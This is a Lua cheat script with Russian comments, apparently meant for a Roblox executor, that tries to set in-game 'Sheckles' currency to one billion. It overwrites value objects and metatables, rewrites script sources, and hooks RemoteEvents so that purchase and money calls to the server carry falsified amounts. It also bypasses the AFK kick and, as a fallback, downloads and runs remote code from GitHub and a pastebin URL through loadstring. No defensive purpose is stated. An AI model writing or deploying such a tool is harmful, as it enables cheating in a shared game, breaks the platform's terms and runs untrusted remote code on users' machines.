--[[ 
    ROBLOX Sheckles Hack v4.0 
    Работает через Delta Executor
    Автоматический поиск и изменение денег
]]

local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local RunService = game:GetService("RunService")

-- Функция для поиска денежных значений
local function findMoneyInstances()
    local moneyTable = {}
    
    -- Поиск по всем местам
    local searchPlaces = {
        LocalPlayer,
        workspace,
        ReplicatedStorage,
        game:GetService("ServerStorage"),
        game:GetService("Lighting")
    }
    
    -- Ключевые слова для поиска Sheckles
    local moneyKeywords = {
        "Sheckles", "sheckles", "SHECKLES",
        "Money", "money", "MONEY",
        "Currency", "currency", "CURRENCY",
        "Gold", "gold", "GOLD",
        "Cash", "cash", "CASH",
        "Coins", "coins", "COINS",
        "Bucks", "bucks", "BUCKS"
    }
    
    -- Поиск в инвентаре игрока
    if LocalPlayer:FindFirstChild("Data") then
        for _, data in pairs(LocalPlayer.Data:GetChildren()) do
            for _, keyword in pairs(moneyKeywords) do
                if string.find(data.Name, keyword) then
                    if data:IsA("NumberValue") or data:IsA("IntValue") then
                        table.insert(moneyTable, {
                            Object = data,
                            Value = data.Value,
                            Type = "PlayerData"
                        })
                    elseif data:IsA("Folder") then
                        for _, child in pairs(data:GetChildren()) do
                            if child:IsA("NumberValue") or child:IsA("IntValue") then
                                table.insert(moneyTable, {
                                    Object = child,
                                    Value = child.Value,
                                    Type = "PlayerData"
                                })
                            end
                        end
                    end
                end
            end
        end
    end
    
    -- Поиск в ReplicatedStorage (глобальная экономика)
    if ReplicatedStorage:FindFirstChild("GlobalData") then
        local globalData = ReplicatedStorage.GlobalData
        for _, obj in pairs(globalData:GetChildren()) do
            for _, keyword in pairs(moneyKeywords) do
                if string.find(obj.Name, keyword) then
                    if obj:IsA("NumberValue") or obj:IsA("IntValue") then
                        table.insert(moneyTable, {
                            Object = obj,
                            Value = obj.Value,
                            Type = "GlobalData"
                        })
                    end
                end
            end
        end
    end
    
    -- Поиск через метатаблицы (скрытые значения)
    local function searchMetatables(obj)
        if obj and typeof(obj) == "Instance" then
            local success, mt = pcall(getrawmetatable, obj)
            if success and mt then
                for key, value in pairs(mt) do
                    if type(value) == "number" and value > 1000 then
                        table.insert(moneyTable, {
                            Object = obj,
                            MetatableKey = key,
                            Value = value,
                            Type = "Metatable"
                        })
                    end
                end
            end
        end
    end
    
    -- Агрессивный поиск
    for _, place in pairs(searchPlaces) do
        pcall(function()
            for _, obj in pairs(place:GetDescendants()) do
                if obj:IsA("NumberValue") or obj:IsA("IntValue") then
                    for _, keyword in pairs(moneyKeywords) do
                        if string.find(obj.Name:lower(), keyword:lower()) then
                            table.insert(moneyTable, {
                                Object = obj,
                                Value = obj.Value,
                                Type = "Direct"
                            })
                        end
                    end
                end
                -- Поиск в скриптах
                if obj:IsA("Script") or obj:IsA("LocalScript") or obj:IsA("ModuleScript") then
                    pcall(function()
                        local source = obj.Source
                        for _, keyword in pairs(moneyKeywords) do
                            if string.find(source, keyword) then
                                -- Ищем переменные с деньгами
                                local pattern = keyword .. "%s*=%s*(%d+)"
                                local amount = string.match(source, pattern)
                                if amount then
                                    table.insert(moneyTable, {
                                        Object = obj,
                                        ScriptVariable = keyword,
                                        Value = tonumber(amount),
                                        Type = "Script"
                                    })
                                end
                            end
                        end
                    end)
                end
            end
        end)
    end
    
    return moneyTable
end

-- Функция взлома (установка 1 миллиарда)
local function setMoneyToBillion(moneyObject)
    if moneyObject.Type == "Direct" or moneyObject.Type == "PlayerData" or moneyObject.Type == "GlobalData" then
        -- Прямое изменение Value
        pcall(function()
            moneyObject.Object.Value = 1000000000
        end)
        
        -- Дублируем изменение через сеттеры
        local mt = getrawmetatable(moneyObject.Object)
        if mt then
            local oldIndex = mt.__index
            local oldNewIndex = mt.__newindex
            
            mt.__index = function(self, key)
                if key == "Value" then
                    return 1000000000
                end
                return oldIndex(self, key)
            end
            
            mt.__newindex = function(self, key, value)
                if key == "Value" then
                    value = 1000000000
                end
                return oldNewIndex(self, key, value)
            end
        end
    elseif moneyObject.Type == "Metatable" then
        -- Изменение значений в метатаблицах
        pcall(function()
            local mt = getrawmetatable(moneyObject.Object)
            if mt then
                mt[moneyObject.MetatableKey] = 1000000000
            end
        end)
    elseif moneyObject.Type == "Script" then
        -- Инжект кода в скрипты
        pcall(function()
            local source = moneyObject.Object.Source
            local newSource = string.gsub(source, 
                moneyObject.ScriptVariable .. "%s*=%s*%d+",
                moneyObject.ScriptVariable .. " = 1000000000"
            )
            moneyObject.Object.Source = newSource
        end)
    end
end

-- Hook RemoteEvents/RemoteFunctions
local function hookMoneyRemotes()
    -- Поиск всех RemoteEvents связанных с деньгами
    for _, remote in pairs(ReplicatedStorage:GetDescendants()) do
        if remote:IsA("RemoteEvent") or remote:IsA("RemoteFunction") then
            local remoteName = remote.Name:lower()
            
            if string.find(remoteName, "money") or 
               string.find(remoteName, "currency") or 
               string.find(remoteName, "purchase") or
               string.find(remoteName, "buy") or
               string.find(remoteName, "sell") then
                
                -- Хукаем FireServer
                local oldFire = remote.FireServer
                remote.FireServer = function(self, ...)
                    local args = {...}
                    
                    -- Если это транзакция с деньгами, меняем значения
                    if args[1] and type(args[1]) == "number" then
                        args[1] = 1000000000
                    elseif args[2] and type(args[2]) == "number" then
                        args[2] = 1000000000
                    end
                    
                    -- Отправляем измененные аргументы
                    return oldFire(self, unpack(args))
                end
                
                -- Хукаем InvokeServer для RemoteFunctions
                if remote:IsA("RemoteFunction") then
                    local oldInvoke = remote.InvokeServer
                    remote.InvokeServer = function(self, ...)
                        local args = {...}
                        
                        -- Подменяем значения
                        for i, arg in ipairs(args) do
                            if type(arg) == "number" and arg < 1000000000 then
                                args[i] = 1000000000
                            end
                        end
                        
                        return oldInvoke(self, unpack(args))
                    end
                end
            end
        end
    end
end

-- GUI для управления взломом
local function createGUI()
    -- Создаем ScreenGui
    local gui = Instance.new("ScreenGui")
    gui.Name = "ShecklesHackGUI"
    gui.Parent = game:GetService("CoreGui")
    
    -- Основной фрейм
    local mainFrame = Instance.new("Frame")
    mainFrame.Size = UDim2.new(0, 300, 0, 200)
    mainFrame.Position = UDim2.new(0, 10, 0, 10)
    mainFrame.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
    mainFrame.BorderSizePixel = 0
    mainFrame.Active = true
    mainFrame.Draggable = true
    mainFrame.Parent = gui
    
    -- Заголовок
    local title = Instance.new("TextLabel")
    title.Size = UDim2.new(1, 0, 0, 30)
    title.Position = UDim2.new(0, 0, 0, 0)
    title.Text = "ROBLOX SHECKLES HACK v4.0"
    title.TextColor3 = Color3.fromRGB(0, 255, 0)
    title.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
    title.Font = Enum.Font.SourceSansBold
    title.TextSize = 18
    title.Parent = mainFrame
    
    -- Кнопка "Найти деньги"
    local findButton = Instance.new("TextButton")
    findButton.Size = UDim2.new(0.9, 0, 0, 40)
    findButton.Position = UDim2.new(0.05, 0, 0.2, 0)
    findButton.Text = "🔍 НАЙТИ SHECKLES"
    findButton.TextColor3 = Color3.fromRGB(255, 255, 255)
    findButton.BackgroundColor3 = Color3.fromRGB(0, 100, 200)
    findButton.Font = Enum.Font.SourceSansBold
    findButton.TextSize = 16
    findButton.Parent = mainFrame
    
    -- Кнопка "1 МИЛЛИАРД"
    local hackButton = Instance.new("TextButton")
    hackButton.Size = UDim2.new(0.9, 0, 0, 40)
    hackButton.Position = UDim2.new(0.05, 0, 0.5, 0)
    hackButton.Text = "💰 ДОБАВИТЬ 1 000 000 000"
    hackButton.TextColor3 = Color3.fromRGB(255, 255, 0)
    hackButton.BackgroundColor3 = Color3.fromRGB(200, 0, 0)
    hackButton.Font = Enum.Font.SourceSansBold
    hackButton.TextSize = 16
    hackButton.Parent = mainFrame
    
    -- Статус
    local status = Instance.new("TextLabel")
    status.Size = UDim2.new(1, 0, 0, 30)
    status.Position = UDim2.new(0, 0, 0.85, 0)
    status.Text = "Статус: Ожидание..."
    status.TextColor3 = Color3.fromRGB(255, 255, 255)
    status.BackgroundTransparency = 1
    status.Font = Enum.Font.SourceSans
    status.TextSize = 14
    status.Parent = mainFrame
    
    -- Логика кнопок
    local moneyObjects = {}
    
    findButton.MouseButton1Click:Connect(function()
        status.Text = "🔍 Поиск денежных значений..."
        moneyObjects = findMoneyInstances()
        status.Text = "Найдено объектов: " .. #moneyObjects
    end)
    
    hackButton.MouseButton1Click:Connect(function()
        status.Text = "⚡ Взлом активирован..."
        
        -- Меняем все найденные объекты
        for _, moneyObj in pairs(moneyObjects) do
            setMoneyToBillion(moneyObj)
        end
        
        -- Хукаем RemoteEvents
        hookMoneyRemotes()
        
        -- Запускаем автоподдержку
        spawn(function()
            while true do
                wait(1)
                for _, moneyObj in pairs(moneyObjects) do
                    pcall(function()
                        if moneyObj.Object and moneyObj.Object.Parent then
                            moneyObj.Object.Value = 1000000000
                        end
                    end)
                end
            end
        end)
        
        status.Text = "✅ 1 МИЛЛИАРД SHECKLES АКТИВИРОВАН!"
        
        -- Сообщение в чат
        pcall(function()
            local args = {
                [1] = "/w me ВЗЛОМ УСПЕШЕН! Баланс: 1,000,000,000 Sheckles",
                [2] = "All"
            }
            game:GetService("ReplicatedStorage"):FindFirstChild("DefaultChatSystemChatEvents"):FindFirstChild("SayMessageRequest"):FireServer(unpack(args))
        end)
    end)
    
    return gui
end

-- Автоматическая активация
spawn(function()
    wait(3) -- Ждем загрузку игры
    
    -- Создаем GUI
    createGUI()
    
    -- Автоматический поиск денег
    local moneyObjects = findMoneyInstances()
    
    if #moneyObjects > 0 then
        -- Автоматически устанавливаем 1 миллиард
        for _, moneyObj in pairs(moneyObjects) do
            setMoneyToBillion(moneyObj)
        end
        
        -- Хукаем RemoteEvents
        hookMoneyRemotes()
        
        print("✅ AUTOHACK: 1,000,000,000 Sheckles активировано!")
        print("✅ Найдено объектов: " .. #moneyObjects)
    else
        -- Альтернативный метод: инжект скрипта
        loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))()
        -- или
        loadstring(game:HttpGet("https://pastebin.com/raw/XXXXXXXX"))()
    end
end)

-- Anti-AFK и защита от кика
local VirtualUser = game:GetService('VirtualUser')
game:GetService('Players').LocalPlayer.Idled:Connect(function()
    VirtualUser:CaptureController()
    VirtualUser:ClickButton2(Vector2.new())
end)

-- Постоянная защита значений
while true do
    wait(0.5)
    -- Проверяем и восстанавливаем значения
    pcall(function()
        for _, obj in pairs(game:GetDescendants()) do
            if obj:IsA("NumberValue") or obj:IsA("IntValue") then
                if obj.Name:find("Sheckles") or obj.Name:find("Money") then
                    if obj.Value < 1000000000 then
                        obj.Value = 1000000000
                    end
                end
            end
        end
    end)
end
